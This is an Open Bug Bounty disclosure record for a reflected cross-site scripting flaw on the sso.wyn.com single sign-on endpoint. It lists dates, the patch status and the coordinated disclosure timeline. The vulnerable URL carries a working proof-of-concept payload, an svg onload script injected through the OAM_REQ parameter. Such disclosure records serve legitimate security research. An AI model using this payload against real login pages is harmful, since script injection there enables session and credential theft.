sso.wyn.com XSS vulnerability

2016-03-12T18:52:00
ID OBB:141187
Type openbugbounty
Reporter Spam404
Modified 2016-06-05T11:26:00

Description

Vulnerable URL:
https://sso.wyn.com/oamfed/idp/samlv20?SAMLRequest=fZFBb4JAEIX%2FCtm77IIWcSMkVg81sS0ptIdemmUZ6yawS3cWrf%2B%2BKG2ih3qeN99782aOoqlbvujcTr%2FAVwfovO%2Bm1sjPg4R0VnMjUCHXogHkTvJ88bjhoc94a40z0tTEWyCCdcropdHYNWBzsHsl4fVlk5Cdcy1yShGNL7dCOmN9DY7mO1WWpga38%2FsRPWFDmj3nBfFWfQ6lxYl4vX84al%2BahhrRbKGiqmrpKeg%2BZMRbrxLyEcgomlWSgWQimsaTKoYwHk8ZzGA6mZRlL0PsYK3RCe0SErIgGrHxKAiLIOZ3jLPZO%2FGy38vula6U%2FrxdQzmIkD8URTYaDngDi%2BfwvYCk81NGfja2F%2FXexoq%2FTkn6X4NzegEeXFr%2B1JPWq8zUSh69RV2bw9KCcJCQgNB0WLn%2BePoD&RelayState=ss%3Amem%3A3dc28ea260a541bb4203f5759176a5a87360d208de936303fa5af948c20f2068&c7u&OAM_REQ=%22%3E%3Csvg/onload=prompt%28/XSSPOSED/%29%3E
Details:

Description| Value
---|---
Patched:| Yes, on 09.04.2016
Latest check for patch:| 09.04.2016 14:34 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| Unknown / Not calculated
Google Pagerank| 0
VIP website status:| No
Check sso.wyn.com SSL connection:| (Grade: F)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 12 March, 2016 18:52 GMT
Generic security notifications sent to website owner| 12 March, 2016 18:55 GMT
Notification sent to subscribers (without technical details)| 12 March, 2016 22:17 GMT
Vulnerability details disclosed by researcher| 4 June, 2016 19:11 GMT
Vulnerability patched by the website owner| 5 June, 2016 11:26 GMT